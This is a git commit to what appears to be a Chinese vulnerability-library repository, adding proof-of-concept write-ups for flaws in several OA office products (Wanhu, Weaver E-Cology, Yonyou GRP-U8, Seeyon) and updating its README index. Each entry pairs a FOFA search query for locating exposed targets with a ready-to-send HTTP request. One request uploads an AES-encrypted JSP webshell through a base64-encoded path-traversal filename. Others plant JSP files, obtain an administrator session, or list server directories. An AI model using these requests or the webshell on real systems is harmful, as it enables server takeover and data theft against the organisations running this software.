更新漏洞库：OA产品漏洞/

2025-11-05 10:50:23 +00:00 · 2022-08-24 14:33:35 +08:00 · 2022-08-24 14:33:35 +08:00 · d0356b6820
commit d0356b6820
parent 38b4eab2b2
6 changed files with 274 additions and 0 deletions
--- a/任意文件上传漏洞.md
+++ b/任意文件上传漏洞.md
@ -0,0 +1,63 @@
+# 万户OA OfficeServer.jsp 任意文件上传漏洞
+
+## 漏洞描述
+
+万户OA 除了 /defaultroot/officeserverservlet 接口外的另一处接口 OfficeServer.jsp 同时也存在任意文件上传漏洞，导致攻击者可上传任意文件获取服务器权限
+
+## 漏洞影响
+
+```
+万户OA
+```
+
+## FOFA
+
+```
+app="万户网络-ezOFFICE"
+```
+
+## 漏洞复现
+
+产品页面
+
+![image-20220824142451484](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202208241424573.png)
+
+发送请求包
+
+```
+POST /defaultroot/public/iWebOfficeSign/OfficeServer.jsp HTTP/1.1
+Host: 
+Pragma: no-cache
+Cache-Control: no-cache
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
+Cookie: OASESSIONID=847AE3A2E5D155AE7FB1CD2C6736CD66
+x-forwarded-for: 127.0.0.1
+x-originating-ip: 127.0.0.1
+x-remote-ip: 127.0.0.1
+x-remote-addr: 127.0.0.1
+Connection: close
+Content-Length: 798
+		
+DBSTEP V3.0     170              0                1000              DBSTEP=REJTVEVQ
+OPTION=U0FWRUZJTEU=
+RECORDID=
+isDoc=dHJ1ZQ==
+moduleType=Z292ZG9jdW1lbnQ=
+FILETYPE=Li4vLi4vcHVibGljL2VkaXQvY21kX3Rlc3QuanNw
+111111111111111111111111111111111111111111111111
+<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
+```
+
+![image-20220824142511911](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202208241425970.png)
+
+上传后的目录为
+
+```
+/defaultroot/public/edit/cmd_test.jsp
+```
+
+![image-20220824142536837](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202208241425906.png)
--- a/任意管理员登录漏洞.md
+++ b/任意管理员登录漏洞.md
@ -0,0 +1,33 @@
+# 泛微OA E-Cology VerifyQuickLogin.jsp 任意管理员登录漏洞
+
+## 漏洞描述
+
+泛微OA E-Cology VerifyQuickLogin.jsp文件中存在任意管理员登录漏洞，攻击着通过发送特殊的请求包可以获取管理员Session
+
+## 漏洞影响
+
+```
+泛微OA E-Cology
+```
+
+## FOFA
+
+```
+app="泛微-协同办公OA"
+```
+
+## 漏洞复现
+
+产品主页
+
+![image-20220824142008751](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202208241420826.png)
+
+验证POC
+
+```
+POST /mobile/plugin/VerifyQuickLogin.jsp
+  
+identifier=1&language=1&ipaddress=x.x.x.x
+```
+
+![image-20220824142028221](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202208241420269.png)
--- a/任意文件上传漏洞.md
+++ b/任意文件上传漏洞.md
@ -0,0 +1,53 @@
+# 用友 GRP-U8 UploadFileData 任意文件上传漏洞
+
+## 漏洞描述
+
+用友 GRP-U8 UploadFileData接口存在任意文件上传漏洞，攻击者通过漏洞可以获取服务器权限
+
+## 漏洞影响
+
+```
+用友 GRP-U8
+```
+
+## 网络测绘
+
+```
+app="用友-GRP-U8"
+```
+
+## 漏洞复现
+
+登录页面
+
+![image-20220824142321531](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202208241423596.png)
+
+验证POC
+
+```
+POST /UploadFileData?action=upload_file&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&foldername=%2e%2e%2f&filename=debugg.jsp&filename=1.jpg HTTP/1.1
+Host: 
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: JSESSIONID=59227D2C93FE3E8C2626DA625CE710F9
+Content-Type: multipart/form-data
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
+
+------WebKitFormBoundary92pUawKc
+Content-Disposition: form-data; name="myFile";filename="test.jpg"
+
+<% out.println("123");%>
+------WebKitFormBoundary92pUawKc--
+```
+
+![image-20220824142335805](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202208241423854.png)
+
+访问写入的文件
+
+```
+/R9iPortal/debugg.jsp
+```
+
+![image-20220824142350845](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202208241423890.png)
--- a/任意文件上传漏洞.md
+++ b/任意文件上传漏洞.md
@ -0,0 +1,83 @@
+# 致远OA wpsAssistServlet 任意文件上传漏洞
+
+## 漏洞描述
+
+致远OA wpsAssistServlet接口存在任意文件上传漏洞，攻击者通过漏洞可以发送特定的请求包上传恶意文件，获取服务器权限
+
+## 漏洞影响
+
+```
+致远OA A6、A8、A8N (V8.0SP2，V8.1，V8.1SP1)
+致远OA G6、G6N (V8.1、V8.1SP1)
+```
+
+## FOFA
+
+```
+app="致远互联-OA" && title="V8.0SP2"
+```
+
+## 漏洞复现
+
+产品主页
+
+![image-20220824142723820](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202208241427877.png)
+
+下载补丁220706-S004 ，对比修改的文件
+
+![image-20220824142736294](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202208241427361.png)
+
+主要修改的是 `com.seeyon.ctp.common.wpsassist.manager.WpsAssistManagerImpl.oaSaveFile` 这个方法
+
+```
+private Map<String, Object> oaSaveFile(HttpServletRequest request, Map<String, Object> param) throws Exception {
+        Map<String, Object> result = Maps.newHashMap();
+        result.put(BusinessKey.OfficeTransResultFlag.getCode(), (Object)null);
+        Long fileId = MapUtils.getLong(param, "fileId");
+        log.info("wpsAssist SaveFile start!fileId=" + fileId);
+        String newPdfFileId = MapUtils.getString(param, "newPdfFileId");
+        if (Strings.isNotBlank(newPdfFileId)) {
+            fileId = Long.valueOf(newPdfFileId);
+        }
+
+        String realFileType = MapUtils.getString(param, "realFileType");
+        String tempFileIdPathSuffix = SystemEnvironment.getSystemTempFolder() + File.separator + fileId + realFileType;
+        Long count = this.saveFileToPath(request, tempFileIdPathSuffix);
+        result.put(BusinessKey.FileSize.getCode(), count);
+        result.putAll(this.createOfficeTransCacheFile(fileId, tempFileIdPathSuffix, MapUtils.getString(param, "canTransFileType")));
+        param.put(BusinessKey.OfficeTransResultFlag.getCode(), result.get(BusinessKey.OfficeTransResultFlag.getCode()));
+        this.copyToUploadAndTrans(param);
+        return result;
+    }
+```
+
+向上追溯调用的 oaSaveFile方法的代码
+
+![image-20220824142757449](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202208241427516.png)
+
+![image-20220824142808032](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202208241428101.png)
+
+在 `com.seeyon.ctp.common.wpsassist.WpsAssistServlet.doPost` 中，flag参数为save时，可以调用文件上传接口
+
+![image-20220824142821539](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202208241428602.png)
+
+`C://Seeyon/A6/base/temporary` 为默认上传的位置，但 `realFileType, fileId` 参数可控，可以通过 ../ 遍历上传到任意目录下，验证POC
+
+```
+POST /seeyon/wpsAssistServlet?flag=save&realFileType=../../../../ApacheJetspeed/webapps/ROOT/debugggg.jsp&fileId=2 HTTP/1.1
+Host: 
+Content-Length: 349
+Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b
+Accept-Encoding: gzip
+
+--59229605f98b8cf290a7b8908b34616b
+Content-Disposition: form-data; name="upload"; filename="123.xls"
+Content-Type: application/vnd.ms-excel
+
+<% out.println("seeyon_vuln");%>
+--59229605f98b8cf290a7b8908b34616b--
+```
+
+![image-20220824142837723](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202208241428763.png)
+
+![image-20220824142846959](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202208241428999.png)
--- a/OA产品漏洞/致远OA
+++ b/OA产品漏洞/致远OA
@ -0,0 +1,31 @@
+# 致远OA 帆软组件 ReportServer 目录遍历漏洞
+
+## 漏洞描述
+
+致远OA 帆软组件 ReportServer接口存在目录遍历漏洞，攻击者通过漏洞可以获取服务器敏感信息
+
+## 漏洞影响
+
+```
+致远OA 帆软组件
+```
+
+## FOFA
+
+```
+title="致远A8-V5协同管理软件 V6.1sp1"
+```
+
+## 漏洞复现
+
+登录页面
+
+![image-20220824142626725](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202208241426793.png)
+
+验证POC
+
+```
+/seeyonreport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=../&currentUserName=admin&currentUserId=1&isWebReport=true
+```
+
+![image-20220824142642510](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202208241426552.png)
--- a/README.md
+++ b/README.md
@ -69,6 +69,7 @@
  * 万户OA download_old.jsp 任意文件下载漏洞
  * 万户OA downloadhttp.jsp 任意文件下载漏洞
  * 万户OA fileUpload.controller 任意文件上传漏洞
+  * 万户OA OfficeServer.jsp 任意文件上传漏洞
  * 万户OA showResult.action 后台SQL注入漏洞
  * 万户OA smartUpload.jsp 任意文件上传漏洞
  * 信呼OA beifenAction.php 后台目录遍历漏洞
@ -90,6 +91,7 @@
  * 泛微OA E-Cology HrmCareerApplyPerView.jsp SQL注入漏洞
  * 泛微OA E-Cology LoginSSO.jsp SQL注入漏洞 CNVD-2021-33202
  * 泛微OA E-Cology users.data 敏感信息泄漏
+  * 泛微OA E-Cology VerifyQuickLogin.jsp 任意管理员登录漏洞
  * 泛微OA E-Office group_xml.php SQL注入漏洞
  * 泛微OA E-Office mysql_config.ini 数据库信息泄漏漏洞
  * 泛微OA E-Office officeserver.php 任意文件读取漏洞
@ -106,6 +108,7 @@
  * 用友 ERP-NC NCFindWeb 目录遍历漏洞
  * 用友 FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞
  * 用友 GRP-U8 Proxy SQL注入 CNNVD-201610-923
+  * 用友 GRP-U8 UploadFileData 任意文件上传漏洞
  * 用友 NC bsh.servlet.BshServlet 远程命令执行漏洞
  * 用友 NC NCFindWeb 任意文件读取漏洞
  * 用友 NC XbrlPersistenceServlet反序列化
@ -126,6 +129,8 @@
  * 致远OA ajax.do 任意文件上传 CNVD-2021-01627
  * 致远OA getSessionList.jsp Session泄漏漏洞
  * 致远OA webmail.do 任意文件下载 CNVD-2020-62422
+  * 致远OA wpsAssistServlet 任意文件上传漏洞
+  * 致远OA 帆软组件 ReportServer 目录遍历漏洞
  * 蓝凌OA admin.do JNDI远程命令执行
  * 蓝凌OA custom.jsp 任意文件读取漏洞
  * 蓝凌OA kmImeetingRes.do 后台SQL注入漏洞 CNVD-2021-01363
@ -226,8 +231,10 @@
  * Nexus Repository Manger group 后台远程命令执行 CVE-2020-10199
  * nginxWebUI cmdOver 后台命令执行漏洞
  * Node-RED ui_base 任意文件读取漏洞
+  * NPS auth_key 未授权访问漏洞
  * OneBlog 小于v2.2.1 远程命令执行漏洞
  * Riskscanner list SQL注入漏洞
+  * Roxy-Wi options.py 远程命令执行漏洞 CVE-2022-31137
  * Seo-Panel 4.8.0 反射型XSS漏洞 CVE-2021-3002
  * ShowDoc AdminUpdateController.class.php 任意文件上传漏洞 CVE-2021-36440
  * ShowDoc PageController.class.php 任意文件上传漏洞
@ -465,6 +472,7 @@
  * HIKVISION 流媒体管理服务器 后台任意文件读取漏洞 CNVD-2021-14544
  * HIKVISION 视频编码设备接入网关 $DATA 任意文件读取
  * HIKVISION 视频编码设备接入网关 showFile.php 任意文件下载漏洞
+  * HIKVISION 综合安防管理平台 applyCT Fastjson远程命令执行漏洞
  * HIKVISION 联网网关 downdb.php 任意文件读取漏洞
  * Huawei DG8045 deviceinfo 信息泄漏漏洞
  * Huawei HG659 lib 任意文件读取漏洞
@ -491,6 +499,8 @@
  * Selea OCR-ANPR摄像机 get_file.php 任意文件读取漏洞
  * Selea OCR-ANPR摄像机 SeleaCamera 任意文件读取漏洞
  * SonicWall SSL-VPN 远程命令执行漏洞
+  * Teleport堡垒机 do-login 任意用户登录漏洞
+  * Teleport堡垒机 get-file 后台任意文件读取漏洞
  * Tenda 11N无线路由器 Cookie 越权访问漏洞
  * Tenda W15E企业级路由器 RouterCfm.cfg 配置文件泄漏漏洞
  * TOTOLink 多个设备 download.cgi 远程命令执行漏洞 CVE-2022-25084
@ -519,6 +529,7 @@
  * 大华 城市安防监控系统平台管理 attachment_downloadByUrlAtt.action 任意文件下载漏洞
  * 奇安信 网康 NS-ASG安全网关 cert_download.php 任意文件读取漏洞
  * 奇安信 网康 下一代防火墙 router 远程命令执行漏洞
+  * 安恒 明御WEB应用防火墙 report.php 任意用户登录漏洞
  * 宏电 H8922 Telnet后门漏洞 CVE-2021-28149
  * 宏电 H8922 后台任意文件读取漏洞 CVE-2021-28152
  * 宏电 H8922 后台命令执行漏洞 CVE-2021-28150